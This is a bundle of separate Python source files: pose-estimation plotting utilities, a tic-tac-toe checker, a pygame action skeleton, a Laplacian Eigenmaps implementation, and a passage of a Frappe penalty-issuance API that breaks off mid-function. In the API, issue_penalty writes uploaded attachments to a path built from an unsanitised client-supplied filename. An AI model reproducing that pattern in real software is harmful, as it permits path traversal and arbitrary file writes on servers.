(6, 7), # pelvis -> back
(7, 8), # back -> neck
(8, 9), # neck -> head
(9, 16), # head -> nose
(8, 13), # neck -> shoulder
(13, 14), # shoulder -> arm
(14, 15), # arm -> hand
(8, 12), # neck -> shoulder
(12, 11), # shoulder -> arm
(11, 10) # arm -> hand
]
def get_joints_index(joint_name):
indices = {
'pelvis': 6,
'head': 9,
        'left hip': 3,
        'left knee': 4,
        'left foot': 5,
        'right hip': 2,
        'right knee': 1,
        'right foot': 0,
}
return indices[joint_name]
def is_vip(joint_i):
vips = map(
get_joints_index,
['pelvis']
)
return joint_i in vips
def draw_kps_in_2d(axis, keypoints_2d, label, marker='o', color='blue'):
    for joint_pair in get_joints_connections():
joints = [
keypoints_2d[joint_pair[0]],
keypoints_2d[joint_pair[1]]
]
xs = joints[0][0], joints[1][0]
ys = joints[0][1], joints[1][1]
axis.plot(
xs, ys,
marker=marker,
markersize=0 if label else 10,
color=color,
)
if label:
xs = keypoints_2d[:, 0]
ys = keypoints_2d[:, 1]
n_points = keypoints_2d.shape[0]
cmap = plt.get_cmap('jet')
colors = cmap(np.linspace(0, 1, n_points))
for point_i in range(n_points):
if is_vip(point_i):
marker, s = 'x', 100
axis.scatter(
[ xs[point_i] ], [ ys[point_i] ],
marker=marker,
s=s,
color=color,
label=label + ' {:.0f}'.format(point_i)
)
else:
marker, s = 'o', 10
axis.scatter(
[ xs[point_i] ], [ ys[point_i] ],
marker=marker,
s=s,
color=colors[point_i]
)
def draw_kps_in_3d(axis, keypoints_3d, label=None, marker='o', color='blue'):
for joint_pair in get_joints_connections():
joints = [
keypoints_3d[joint_pair[0]],
keypoints_3d[joint_pair[1]]
]
xs = joints[0][0], joints[1][0]
ys = joints[0][1], joints[1][1]
zs = joints[0][2], joints[1][2]
axis.plot(
xs, ys, zs,
marker=marker,
markersize=0 if label else 5,
color=color,
)
if label:
xs = keypoints_3d[:, 0]
ys = keypoints_3d[:, 1]
zs = keypoints_3d[:, 2]
n_points = keypoints_3d.shape[0]
cmap = plt.get_cmap('jet')
colors = cmap(np.linspace(0, 1, n_points))
for point_i in range(n_points):
if is_vip(point_i):
marker, s = 'x', 100
axis.scatter(
[ xs[point_i] ], [ ys[point_i] ], [ zs[point_i] ],
marker=marker,
s=s,
color=color,
label=label
)
else:
marker, s = 'o', 10
axis.scatter(
[ xs[point_i] ], [ ys[point_i] ], [ zs[point_i] ],
marker=marker,
s=s,
color=colors[point_i]
)
print(label, 'centroid ~', keypoints_3d.mean(axis=0))
print(label, 'pelvis ~', keypoints_3d[get_joints_index('pelvis')])
def compare_in_world(try2align=True, scaling=False, force_pelvis_in_origin=True, show_metrics=True):
def _f(axis, gt, pred):
if try2align:
pred = apply_umeyama(
gt.unsqueeze(0),
pred.unsqueeze(0),
scaling=scaling
)[0]
if force_pelvis_in_origin:
pred = pred - pred[PELVIS_I].unsqueeze(0).repeat(17, 1)
gt = gt - gt[PELVIS_I].unsqueeze(0).repeat(17, 1)
draw_kps_in_3d(
axis, gt.detach().cpu().numpy(), label='gt',
marker='o', color='blue'
)
draw_kps_in_3d(
axis, pred.detach().cpu().numpy(), label='pred',
marker='^', color='red'
)
if show_metrics:
criterion = KeypointsMSESmoothLoss(threshold=20*20)
loss = criterion(pred.unsqueeze(0), gt.unsqueeze(0))
print(
'loss ({}) = {:.3f}'.format(
str(criterion), loss
)
)
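            # MPJPE: mean over the joints of the per-joint Euclidean distance
            # between prediction and GT (both pelvis-centered above)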
per_pose_error_relative = torch.sqrt(
((gt - pred) ** 2).sum(1)
).mean(0)
print(
'MPJPE (relative 2 pelvis) = {:.3f} mm'.format(
per_pose_error_relative
)
)
return _f
def viz_experiment_samples():
def load_data(config, dumps_folder):
def _load(file_name):
f_path = dumps_folder / file_name
return torch.load(f_path).cpu().numpy()
keypoints_3d_gt = _load('kps_world_gt.trc') # see `cam2cam:_save_stuff`
keypoints_3d_pred = _load('kps_world_pred.trc')
indices = None # _load('batch_indexes.trc')
_, val_dataloader, _ = setup_dataloaders(config, distributed_train=False) # ~ 0 seconds
return keypoints_3d_gt, keypoints_3d_pred, indices, val_dataloader
def get_dump_folder(milestone, experiment):
tesi_folder = Path('~/Scuola/now/thesis').expanduser()
milestones = tesi_folder / 'milestones'
current_milestone = milestones / milestone
folder = 'human36m_alg_AlgebraicTriangulationNet@{}'.format(experiment)
return current_milestone / folder / 'epoch-0-iter-0'
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--milestone', type=str, required=True,
help='milestone name, e.g "20.05_27.05_rodrigezzzzzzzzzz"'
)
parser.add_argument(
'--exp', type=str, required=True,
            help='experiment name, e.g "25.05.2021-18:58:36"'
)
return parser.parse_args()
args = parse_args()
milestone, experiment_name = args.milestone, args.exp
config = get_config('experiments/human36m/train/human36m_alg.yaml')
dumps_folder = get_dump_folder(milestone, experiment_name)
gts, pred, _, dataloader = load_data(config, dumps_folder)
per_pose_error_relative, per_pose_error_absolute, _ = dataloader.dataset.evaluate(
pred,
split_by_subject=True,
keypoints_gt_provided=gts,
) # (average 3D MPJPE (relative to pelvis), all MPJPEs)
message = 'MPJPE relative to pelvis: {:.1f} mm, absolute: {:.1f} mm'.format(
per_pose_error_relative,
per_pose_error_absolute
) # just a little bit of live debug
print(message)
max_plots = 6
n_samples = gts.shape[0]
n_plots = min(max_plots, n_samples)
samples_to_show = np.random.permutation(np.arange(n_samples))[:n_plots]
print('found {} samples but plotting {}'.format(n_samples, n_plots))
fig = plt.figure(figsize=plt.figaspect(1.5))
fig.set_facecolor('white')
for i, sample_i in enumerate(samples_to_show):
axis = fig.add_subplot(2, 3, i + 1, projection='3d')
compare_in_world(
try2align=True,
scaling=False,
force_pelvis_in_origin=True,
show_metrics=True
)(
axis,
torch.FloatTensor(gts[sample_i]),
torch.FloatTensor(pred[sample_i])
)
print(
'sample #{} (#{}): pelvis predicted @ ({:.1f}, {:.1f}, {:.1f})'.format(
i,
sample_i,
pred[sample_i, 6, 0],
pred[sample_i, 6, 1],
pred[sample_i, 6, 2],
)
)
# axis.legend(loc='lower left')
plt.tight_layout()
plt.show()
def viz_2ds():
keypoints_2d = torch.tensor([
[[ 4.8415e-01, 2.1003e+00],
[-2.7001e-02, 1.1663e+00],
[-2.8865e-01, -8.5847e-02],
[ 2.9798e-01, 8.8624e-02],
[-1.7468e-01, 1.3790e+00],
[-5.6043e-01, 2.6243e+00],
[ 0.0000e+00, 0.0000e+00],
[ 7.6863e-02, -6.8167e-01],
[ 5.9208e-02, -1.4519e+00],
[ 2.5522e-02, -1.9191e+00],
[-4.1919e-01, -5.3182e-01],
[-5.2262e-01, -5.5556e-01],
[-2.4472e-01, -1.2919e+00],
[ 4.3363e-01, -1.3549e+00],
[ 1.0899e+00, -8.9900e-01],
[ 9.7792e-01, -1.4139e+00],
[ 1.3063e-03, -1.6318e+00]],
[[ 2.3046e+00, 1.0602e+00],
[ 1.2328e+00, 5.0544e-01],
[-6.0097e-02, 2.6153e-01],
[ 6.0097e-02, -2.6153e-01],
[ 1.3166e+00, -2.2383e-01],
[ 2.5585e+00, -9.4359e-02],
[ 0.0000e+00, 0.0000e+00],
[-6.7088e-01, -5.7899e-04],
[-1.4296e+00, -7.1418e-02],
[-1.8864e+00, -1.3718e-01],
[-5.4844e-01, -3.7660e-01],
[-5.2444e-01, 3.4245e-01],
[-1.2682e+00, 1.5023e-01],
[-1.3374e+00, -2.3499e-01],
[-9.0852e-01, -5.3400e-01],
[-1.4061e+00, -1.0684e+00],
[-1.6061e+00, -3.3483e-01]],
])
_, axis = get_figa(1, 1, heigth=10, width=5)
colors = list(mcolors.TABLEAU_COLORS.values())
for view_i, color in zip(range(keypoints_2d.shape[0]), colors):
kps = keypoints_2d[view_i]
if view_i == 0:
kps = (torch.eye(2) * -1).matmul(kps.view(2, 17)).view(17, 2)
norm = torch.norm(kps, p='fro') * 1e2
label = 'view #{:0d} norm={:.2f}'.format(view_i, norm)
draw_kps_in_2d(axis, kps.cpu().numpy(), label=label, color=color)
#axis.set_ylim(axis.get_ylim()[::-1]) # invert
axis.legend(loc='lower right')
plt.tight_layout()
plt.show()
# todo refactor
def plot_vector(axis, vec, from_origin=True, color='black'):
if from_origin:
axis.quiver(
0, 0, 0,
*vec,
normalize=False,
length=1e3,
color=color
)
else:
axis.quiver(
*vec,
0, 0, 0,
normalize=False,
length=1e3,
color=color
)
def debug_live_training():
K = build_intrinsics(
translation=(0, 0),
f=(1e2, 1e2),
shear=0
)
cam_pred = torch.tensor([
[[-4.2443e-01, -7.4665e-01, -5.1222e-01, 0.0000e+00],
[ 2.4692e-01, -6.3970e-01, 7.2788e-01, 0.0000e+00],
[-8.7114e-01, 1.8246e-01, 4.5588e-01, 1.5252e+05]],
[[ 7.5974e-01, -3.0468e-01, 5.7442e-01, -3.4799e+03],
[-1.5405e-01, 7.7392e-01, 6.1426e-01, -3.7902e+03],
[-6.3171e-01, -5.5517e-01, 5.4104e-01, 2.1839e+03]],
[[ 7.3524e-01, -3.2578e-01, 5.9437e-01, -3.8283e+03],
[-1.2664e-01, 7.9545e-01, 5.9265e-01, -3.6438e+03],
[-6.6587e-01, -5.1101e-01, 5.4359e-01, 2.1683e+03]],
[[ 7.2222e-01, -3.5045e-01, 5.9630e-01, -3.6894e+03],
[-1.0154e-01, 7.9907e-01, 5.9260e-01, -3.6506e+03],
[-6.8417e-01, -4.8854e-01, 5.4152e-01, 2.0948e+03]]
]).float()
cam_gt = torch.tensor([
[[-9.2829e-01, 3.7185e-01, 6.5016e-04, 5.6843e-14],
[ 1.0662e-01, 2.6784e-01, -9.5755e-01, 0.0000e+00],
[-3.5624e-01, -8.8881e-01, -2.8828e-01, 5.5426e+03]],
[[-7.3154e-01, 1.7293e-01, -6.5950e-01, 3.6554e+03],
[-2.1223e-01, 8.6149e-01, 4.6130e-01, -2.5568e+03],
[ 6.4792e-01, 4.7743e-01, -5.9351e-01, 9.0016e+03]],
[[ 7.6961e-01, -1.3799e-01, 6.2342e-01, -3.4554e+03],
[ 1.2878e-01, 9.8985e-01, 6.0114e-02, -3.3319e+02],
[-6.2539e-01, 3.4022e-02, 7.7957e-01, 1.3629e+03]],
[[-9.9562e-01, -9.1829e-02, -1.7330e-02, 9.6054e+01],
[-8.3708e-02, 7.9393e-01, 6.0222e-01, -3.3379e+03],
[-4.1542e-02, 6.0103e-01, -7.9814e-01, 8.9065e+03]]
]).float()
pred = torch.tensor([
[ -160.3910, -769.9235, -321.0890],
[ -266.9682, -311.4738, -160.7710],
[ -456.6614, 182.6224, 201.5943],
[ -357.4164, 145.4103, 475.0630],
[ -487.4498, -225.8628, 514.1423],
[ -547.2083, -1039.7829, -34.5466],
[ 0.0000, 0.0000, 0.0000],
[ -241.1220, 298.0778, 383.7975],
[ -194.8609, 582.7874, 498.8811],
[ -83.1367, 828.0535, 480.5881],
[ -110.3319, 190.7841, 393.7511],
[ -644.9359, 316.2966, 211.1616],
[ -432.4880, 358.7843, 582.5133],
[ -281.9765, 413.0376, 217.3509],
[ -183.0061, 203.4561, 4.5386],
[ -235.3027, 138.4676, 75.6848],
[ -455.3205, 513.7687, 459.1732]
]).float()
gt = torch.tensor([
[ -79.5401, -636.6202, -37.0452],
[ -80.1006, -342.1938, 287.2476],
[-134.9715, 8.6331, 13.0857],
[ 134.9714, -8.6331, -13.0857],
[ 123.5578, -341.4131, 287.5503],
[ 132.1298, -641.1887, -31.6872],
[ 0.0000, 0.0000, 0.0000],
[ 51.0227, 177.0769, 131.2592],
[ 106.6453, 294.1788, 351.3190],
[ 84.2807, 248.4880, 481.9431],
[-230.4554, 277.3011, -61.3511],
[-153.6896, 433.7529, 114.1089],
[ -23.4383, 343.8069, 339.6841],
[ 245.7708, 285.6294, 341.7256],
[ 396.1953, 433.1156, 164.0866],
[ 430.9688, 338.0313, -61.5378],
[ 67.0051, 198.7636, 379.6946]
]).float()
def _compare_in_camspace(try2align=True, scaling=False, force_pelvis_in_origin=False, from_master=None):
def _get_Rt(cams, cam_i, from_master):
            if from_master is not None:
master = torch.vstack([
cams[from_master],
torch.tensor([0, 0, 0, 1])
]) # ~ 4 x 4, to allow inverse
full = torch.mm(
torch.vstack([
cams[cam_i],
torch.tensor([0, 0, 0, 1])
]),
torch.inverse(master)
)
return full[:3, :3], full[:3, 3]
else:
return cams[cam_i, :3, :3], cams[cam_i, :3, 3]
def _f(axis, cam_i, cam_gt, cam_pred, gt, pred):
R, t = _get_Rt(cam_gt, cam_i, from_master)
cam = Camera(R, t, K)
in_cam = cam.world2cam()(gt.detach().cpu())
if force_pelvis_in_origin:
in_cam = in_cam - in_cam[PELVIS_I].unsqueeze(0).repeat(17, 1)
draw_kps_in_3d(
axis, in_cam.detach().cpu().numpy(), label='gt',
marker='^', color='blue'
)
R, t = _get_Rt(cam_pred, cam_i, from_master)
cam = Camera(R, t, K)
other_in_cam = cam.world2cam()(pred.detach().cpu())
if force_pelvis_in_origin:
other_in_cam = other_in_cam - other_in_cam[PELVIS_I].unsqueeze(0).repeat(17, 1)
if try2align:
other_in_cam = apply_umeyama(
in_cam.unsqueeze(0),
other_in_cam.unsqueeze(0),
scaling=scaling
)[0]
draw_kps_in_3d(
axis, other_in_cam.detach().cpu().numpy(), label='pred',
marker='^', color='red'
)
return _f
def _compare_in_proj(axis, cam_i, norm=False):
def _plot(cam, kps, label, color):
in_proj = cam.world2proj()(kps.detach().cpu())
if norm:
in_proj /= torch.norm(in_proj, p='fro')
draw_kps_in_2d(
axis, in_proj.cpu().numpy(), label=label, color=color
)
print(in_proj[3:9])
return in_proj # just for debugging
cam = Camera(
cam_gt[cam_i, :3, :3],
cam_gt[cam_i, :3, 3],
K
)
_plot(cam, gt, 'gt', 'blue')
cam = Camera(
cam_pred[cam_i, :3, :3],
cam_pred[cam_i, :3, 3],
K
)
_plot(cam, pred, 'pred', 'red')
def _plot_cam_config(axis, gt, pred):
cmap = plt.get_cmap('jet')
colors = cmap(np.linspace(0, 1, len(pred)))
locs = get_cam_location_in_world(pred)
axis.scatter(
locs[:, 0], locs[:, 1], locs[:, 2],
marker='o',
s=600,
)
# for i, loc in enumerate(locs):
# axis.scatter(
# [ loc[0] ], [ loc[1] ], [ loc[2] ],
# marker='o',
# s=600,
# color=colors[i],
# label='pred cam #{:.0f}'.format(i)
# )
# plot_vector(axis, loc, from_origin=False)
# locs = get_cam_location_in_world(cam_gt)
# for i, loc in enumerate(locs):
# axis.scatter(
# [ loc[0] ], [ loc[1] ], [ loc[2] ],
# marker='x',
# s=600,
# color=colors[i],
# label='GT cam #{:.0f}'.format(i)
# )
# plot_vector(axis, loc, from_origin=False)
plot_vector(axis, [1, 0, 0]) # X
plot_vector(axis, [0, 1, 0]) # Y
plot_vector(axis, [0, 0, 1]) # Z
#axis.legend()
fig = plt.figure(figsize=plt.figaspect(1.5))
axis = fig.add_subplot(1, 1, 1, projection='3d')
compare_in_world(
try2align=False,
scaling=False,
force_pelvis_in_origin=True,
show_metrics=True
)(axis, gt, pred)
# _compare_in_camspace(
# try2align=True,
# scaling=False,
# force_pelvis_in_origin=True,
# from_master=0
# )(axis, 1, cam_gt, cam_pred, gt, pred)
#axis = fig.add_subplot(1, 1, 1)
#_compare_in_proj(axis, cam_i=0, norm=False)
# axis.legend(loc='lower left')
plt.tight_layout()
plt.show()
def debug_noisy_kps():
pred = torch.tensor([[-2.4766e+00, 1.3749e+02],
[ 5.1553e+00, 6.4850e+01],
[ 2.0758e+01, -5.5261e+00],
[-2.1199e+01, 5.6435e+00],
[-2.6096e+01, 6.9830e+01],
[-2.7770e+01, 1.4269e+02],
[-7.5650e-16, 8.0752e-15],
[-1.5507e+01, -2.8643e+01],
[-3.7743e+01, -4.8863e+01],
[-3.7260e+01, -6.8515e+01],
[-4.3409e+01, -4.1714e+01],
[-1.0379e+01, -2.9870e+01],
[-1.2607e+01, -4.6328e+01],
[-5.6277e+01, -4.2062e+01],
[-7.1047e+01, 3.4976e+00],
[-4.0396e+01, 3.5121e+01],
[-4.1566e+01, -5.1796e+01]])
gt = torch.tensor([[ -4.2729, 135.4911],
[ 7.2749, 65.5788],
[ 20.6505, -8.0638],
[-22.5586, 5.5275],
[-30.7718, 69.5852],
[-28.9555, 139.2640],
[ -0.5923, -3.4187],
[-15.7863, -32.1939],
[-35.3697, -47.2574],
[-41.1945, -67.7720],
[-46.1246, -44.4364],
[-13.1253, -29.5808],
[-13.6145, -43.1209],
[-54.4943, -42.5870],
[-71.2272, 4.1981],
[-41.6380, 34.4177],
[-40.1495, -48.8374]])
fig = plt.figure(figsize=plt.figaspect(1.5))
axis = fig.add_subplot(1, 1, 1)
draw_kps_in_2d(axis, pred.detach().cpu().numpy(), label='gt', marker='^', color='red')
draw_kps_in_2d(axis, gt.detach().cpu().numpy(), label='gt', marker='o', color='blue')
axis.set_ylim(axis.get_ylim()[::-1]) # invert
# axis.legend(loc='lower left')
plt.tight_layout()
plt.show()
if __name__ == '__main__':
debug_live_training()
#debug_noisy_kps()
#viz_experiment_samples()
#viz_2ds()
#viz_geodesic()
#viz_berhu()
#viz_huber()
#viz_se_smooth()
|
#!/usr/bin/env python3
"""
Author : qianying
Date : 2019-04-03
Purpose: Rock the Casbah
"""
import argparse
import sys
import re
# --------------------------------------------------
def get_args():
"""get command-line arguments"""
parser = argparse.ArgumentParser(
description='Argparse Python script',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'positional', metavar='STATE', help='A positional argument')
return parser.parse_args()
# --------------------------------------------------
def warn(msg):
"""Print a message to STDERR"""
print(msg, file=sys.stderr)
# --------------------------------------------------
def die(msg='Something bad happened'):
"""warn() and exit with error"""
warn(msg)
sys.exit(1)
# --------------------------------------------------
def main():
"""Make a jazz noise here"""
args = get_args()
pos_arg = args.positional
    passing_re = re.compile('^[XO.]{9}$')
if not passing_re.match(pos_arg):
print('State "{}" must be 9 characters of only ., X, O'.format(pos_arg))
sys.exit(0)
wins = [('X', 'XXX......'), ('O', 'OOO......'), ('X', '...XXX...'),
('O', '...OOO...'), ('X', '......XXX'), ('O', '......OOO'),
('X', 'X..X..X..'), ('O', 'O..O..O..'), ('X', '.X..X..X.'),
('O', '.O..O..O.'), ('X', '..X..X..X'), ('O', '..O..O..O'),
('X', 'X...X...X'), ('O', 'O...O...O'), ('X', '..X.X.X..'),
('O', '..O.O.O..')]
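    # Each win pattern doubles as a regex: '.' matches any cell, so e.g.
    # 'XXX......' matches 'XXXOO.O..' (X owns the whole top row).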
for winner, state in wins:
if re.match(state, pos_arg):
print('{} has won'.format(winner))
sys.exit(0)
print('No winner')
# --------------------------------------------------
if __name__ == '__main__':
main()
|
import pygame
class Action:
packet_name = None
network_command = False
data_required = True
def __init__(self, data=None, target_id=None):
# target_id is the id of the player to send this packet to
if not self.packet_name:
raise TypeError("packet_name not initialized")
if not isinstance(self.network_command, bool):
raise TypeError("network_command should be boolean")
if data is not None and not isinstance(data, dict):
raise TypeError("Data should be dictionary")
if self.data_required and data is None:
raise TypeError("Data should not be empty in this packet")
self.data = data or {}
self.target_id = target_id
def toJSON(self):
return {"packet": self.packet_name,
"data": self.data}
    def run(self, game_state):
"""
Command run in the client
"""
pass
    def run_server(self, game_state):
"""
Command run when server receives this action
"""
pass
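# A minimal sketch of a concrete action (hypothetical packet name and payload;
# real actions are defined elsewhere in the game):
#
#     class MoveAction(Action):
#         packet_name = "move"
#
#         def run(self, game_state):
#             # apply {"dx": ..., "dy": ...} from self.data to the local state
#             pass
#
#     MoveAction(data={"dx": 1, "dy": 0}).toJSON()
#     # -> {"packet": "move", "data": {"dx": 1, "dy": 0}}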
class GameState:
"""
This is the store in the Flux architecture
"""
def __init__(self):
self.clock = pygame.time.Clock()
def attach_engine(self, engine):
self.engine = engine
def run_action(self, action):
self.engine.apply(action)
def update(self):
self.clock.tick(60)
def draw(self, screen):
pass
|
#####################################
# Fast spectral decomposition and Laplacian Eigenmaps
# Author: Davi Sidarta-Oliveira
# School of Medical Sciences,University of Campinas,Brazil
# contact: davisidarta[at]gmail.com
######################################
import numpy as np
import pandas as pd
from scipy import sparse
from fastlapmap.similarities import fuzzy_simplicial_set_ann, cknn_graph, diffusion_harmonics
def LapEigenmap(data,
n_eigs=10,
k=10,
metric='euclidean',
efC=20,
efS=20,
M=10,
similarity='diffusion',
n_jobs=1,
norm_laplacian=True,
eigen_tol=10e-4,
return_evals=False,
p=11/16,
verbose=False):
"""
Performs [Laplacian Eigenmaps](https://www2.imm.dtu.dk/projects/manifold/Papers/Laplacian.pdf) on the input data.
----------
Parameters
----------
`data` : numpy.ndarray, pandas.DataFrame or scipy.sparse.csr_matrix Input data. By default will use nmslib for
approximate nearest-neighbors, which works both on numpy arrays and sparse matrices (faster and cheaper option).
Alternatively, users can provide a precomputed affinity matrix by stating `metric='precomputed'`.
`n_eigs` : int (optional, default 10).
Number of eigenvectors to decompose the graph Laplacian into.
`k` : int (optional, default 10).
Number of k-nearest-neighbors to use when computing affinities.
`metric` : str (optional, default 'euclidean').
which metric to use when computing neighborhood distances. Defaults to 'euclidean'.
Accepted metrics include:
-'sqeuclidean'
-'euclidean'
-'l1'
-'lp' - requires setting the parameter `p` - equivalent to minkowski distance
-'cosine'
-'angular'
-'negdotprod'
-'levenshtein'
-'hamming'
-'jaccard'
-'jansen-shan'
`M` : int (optional, default 10).
    defines the maximum number of neighbors in the zero and above-zero layers during HNSW
    (Hierarchical Navigable Small World Graph). However, the actual default maximum number
    of neighbors for the zero layer is 2*M. A reasonable range for this parameter
    is 5-100. For more information on HNSW, please check https://arxiv.org/abs/1603.09320.
    HNSW is implemented in python via NMSlib. Please check more about NMSlib at https://github.com/nmslib/nmslib.
`efC` : int (optional, default 20).
A 'hnsw' parameter. Increasing this value improves the quality of a constructed graph
and leads to higher accuracy of search. However this also leads to longer indexing times.
A reasonable range for this parameter is 10-500.
`efS` : int (optional, default 100).
A 'hnsw' parameter. Similarly to efC, increasing this value improves recall at the
expense of longer retrieval time. A reasonable range for this parameter is 10-500.
`n_jobs` : int (optional, default 1)
How many threads to use in approximate-nearest-neighbors computation.
`similarity` : str (optional, default 'diffusion').
Which algorithm to use for similarity learning. Options are diffusion harmonics ('diffusion')
, fuzzy simplicial sets ('fuzzy') and continuous k-nearest-neighbors ('cknn').
`norm_laplacian` : bool (optional, default True).
Whether to renormalize the graph Laplacian.
`return_evals` : bool (optional, default False).
Whether to also return the eigenvalues in a tuple of eigenvectors, eigenvalues. Defaults to False.
`verbose` : bool (optional, default False).
Whether to report information on the current progress of the algorithm.
----------
Returns
----------
* If return_evals is True :
A tuple of eigenvectors and eigenvalues.
* If return_evals is False :
An array of ranked eigenvectors.
"""
if isinstance(data, np.ndarray):
data = sparse.csr_matrix(data)
elif isinstance(data, pd.DataFrame):
data = data.to_numpy()
data = sparse.csr_matrix(data)
elif isinstance(data, sparse.csr_matrix):
pass
    else:
        raise TypeError('Data should be a numpy.ndarray, pandas.DataFrame or '
                        'a scipy.sparse.csr_matrix for obtaining approximate nearest neighbors with \'nmslib\'.')
if metric != 'precomputed':
if similarity == 'diffusion':
W = diffusion_harmonics(data, n_neighbors=k, metric=metric, efC=efC, efS=efS, M=M, p=p, n_jobs=n_jobs, verbose=verbose)
elif similarity == 'fuzzy':
fuzzy_results = fuzzy_simplicial_set_ann(data, n_neighbors=k, metric=metric, efC=efC, efS=efS, M=M, p=p, n_jobs=n_jobs, verbose=verbose)
W = fuzzy_results[0]
        elif similarity == 'cknn':
            W = cknn_graph(data, n_neighbors=k, metric=metric, n_jobs=n_jobs, efC=efC, efS=efS, M=M, include_self=True, is_sparse=True, return_adj=False)
    else:
        # metric == 'precomputed': the input is already an affinity matrix
        W = data
# Enforce symmetry
W = (W + W.T) / 2
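    # Graph Laplacian L = D - W (symmetrically normalized when
    # norm_laplacian=True). eigsh below runs in shift-invert mode around
    # sigma=1.0 on -L with unit diagonal, which targets the smallest
    # eigenvalues of L, i.e. the smoothest eigenvectors.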
laplacian, dd = sparse.csgraph.laplacian(W, normed=norm_laplacian,
return_diag=True)
laplacian = _set_diag(laplacian, 1, norm_laplacian)
laplacian *= -1
n_eigs = n_eigs + 1
evals, evecs = sparse.linalg.eigsh(laplacian, k=n_eigs, which='LM', sigma=1.0, tol=eigen_tol)
evecs = evecs.T[n_eigs::-1]
if norm_laplacian:
# recover u = D^-1/2 x from the eigenvector output x
evecs = evecs / dd
evecs = evecs[1:n_eigs].T
if return_evals:
return evecs, evals
else:
return evecs
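# A minimal usage sketch (hypothetical random data, just to show the call):
#
#     data = np.random.rand(500, 20)          # 500 samples, 20 features
#     emb = LapEigenmap(data, n_eigs=2, k=10, similarity='diffusion')
#     print(emb.shape)                        # -> (500, 2)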
def _set_diag(laplacian, value, norm_laplacian):
"""Set the diagonal of the laplacian matrix and convert it to a
sparse format well suited for eigenvalue decomposition.
Parameters
----------
laplacian : {ndarray, sparse matrix}
The graph laplacian.
value : float
The value of the diagonal.
norm_laplacian : bool
Whether the value of the diagonal should be changed or not.
Returns
-------
laplacian : {array, sparse matrix}
An array of matrix in a form that is well suited to fast
eigenvalue decomposition, depending on the band width of the
matrix.
"""
n_nodes = laplacian.shape[0]
    # We need all entries in the diagonal to be set to the given value
if not sparse.isspmatrix(laplacian):
if norm_laplacian:
laplacian.flat[:: n_nodes + 1] = value
else:
laplacian = laplacian.tocoo()
if norm_laplacian:
diag_idx = laplacian.row == laplacian.col
laplacian.data[diag_idx] = value
# If the matrix has a small number of diagonals (as in the
# case of structured matrices coming from images), the
# dia format might be best suited for matvec products:
n_diags = np.unique(laplacian.row - laplacian.col).size
if n_diags <= 7:
# 3 or less outer diagonals on each side
laplacian = laplacian.todia()
else:
# csr has the fastest matvec and is thus best suited to
# arpack
laplacian = laplacian.tocsr()
return laplacian
|
import frappe, base64
from frappe.utils import cint
from one_fm.legal.doctype.penalty_issuance.penalty_issuance import get_filtered_employees
from one_fm.legal.doctype.penalty.penalty import send_email_to_legal, upload_image
from one_fm.one_fm.page.face_recognition.face_recognition import recognize_face
from frappe import _
import pickle, face_recognition
import json
from one_fm.api.v1.utils import response
@frappe.whitelist()
def get_employee_list(shift: str = None, penalty_occurence_time: str = None) -> dict:
if not shift:
return response("Bad Request", 400, None, "shift required.")
if not penalty_occurence_time:
return response("Bad Request", 400, None, "penalty_ocurrence_time required.")
if not isinstance(shift, str):
return response("Bad Request", 400, None, "shift must be of type str.")
if not isinstance(penalty_occurence_time, str):
return response("Bad Request", 400, None, "penalty_ocurrence_time must be of type str.")
try:
result = get_filtered_employees(shift, penalty_occurence_time, as_dict=1)
return response("Success", 200, result)
except Exception as error:
return response("Internal Server Error", 500, None, error)
@frappe.whitelist()
def get_penalty_types():
""" This method gets the list of penalty types. """
try:
result = frappe.db.sql("""SELECT name, penalty_name_arabic FROM `tabPenalty Type` """, as_dict=1)
return response("Success", 200, result)
except Exception as error:
return response("Internal Server Error", 500, None, error)
@frappe.whitelist()
def get_all_shifts():
try:
result = frappe.db.sql("""SELECT osh.name, osh.site, osh.project, ost.site_location
FROM `tabOperations Shift` osh, `tabOperations Site` ost
WHERE osh.site=ost.name
ORDER BY name ASC """, as_dict=1)
return response("Success", 200, result)
except Exception as error:
return response("Internal Server Error", 500, None, error)
@frappe.whitelist()
def issue_penalty(penalty_category, issuing_time, issuing_location, penalty_location, penalty_occurence_time,company_damage, customer_property_damage, asset_damage, other_damages, shift=None, site=None, project=None, site_location=None, penalty_employees=[], penalty_details=[]):
try:
employee, employee_name, designation = frappe.get_value("Employee", {"user_id": frappe.session.user}, ["name","employee_name", "designation"])
penalty_issuance = frappe.new_doc("Penalty Issuance")
penalty_issuance.penalty_category = penalty_category
penalty_issuance.issuing_time = issuing_time
penalty_issuance.location = issuing_location
penalty_issuance.penalty_location = penalty_location
penalty_issuance.penalty_occurence_time = penalty_occurence_time
penalty_issuance.issuing_employee = employee
penalty_issuance.employee_name = employee_name
penalty_issuance.designation = designation
penalty_issuance.customer_property_damage = cint(customer_property_damage)
penalty_issuance.company_damage = cint(company_damage)
penalty_issuance.other_damages = cint(other_damages)
penalty_issuance.asset_damage = cint(asset_damage)
employees = json.loads(penalty_employees)
for employee in employees:
penalty_issuance.append('employees', employee)
penalty_issuance_details = json.loads(penalty_details)
for detail in penalty_issuance_details:
if detail["attachments"] and detail["attachment_name"]:
filename = detail["attachment_name"]
attach = detail["attachments"]
content = base64.b64decode(attach)
                output_image_path = frappe.utils.cstr(frappe.local.site) + "/public/files/Legal/" + filename
                with open(output_image_path, "wb") as fh:
                    fh.write(content)
                attachment_file = "/files/Legal/" + filename
                detail.update({'attachments': attachment_file})
detail.pop("attachment_name")
penalty_issuance.append('penalty_issuance_details', detail)
if penalty_category == "Performace":
penalty_issuance.shift = shift
penalty_issuance.site = site
penalty_issuance.project = project
penalty_issuance.site_location = site_location
penalty_issuance.insert()
penalty_issuance.submit()
return response("Success", 201, penalty_issuance)
except Exception as error:
return response("Internal Server Error", 500, None, error)
@frappe.whitelist()
def get_penalties(employee_id: str = None, role: str = None) -> dict:
if not employee_id:
return response("Bad Request", 400, None, "employee_id required.")
if not isinstance(employee_id, str):
return response("Bad Request", 400, None, "employee_id must be of type str.")
if role:
if not isinstance(role, str):
return response("Bad Request", 400, None ,"role must be of type str.")
try:
employee = frappe.db.get_value("Employee", {"employee_id": employee_id})
if not employee:
return response("Resource not found", 404, None, "No employee found with {employee_id}".format(employee_id=employee_id))
if role and role == "Issuance":
result = frappe.get_list("Penalty", filters={"issuer_employee": employee}, fields=["name", "penalty_issuance_time", "workflow_state"], order_by="modified desc")
if len(result) > 0:
return response("Success", 200, result)
else:
return response("Resource not found", 404, None, "No penalties found for {employee} with role as {role}".format(employee=employee, role=role))
else:
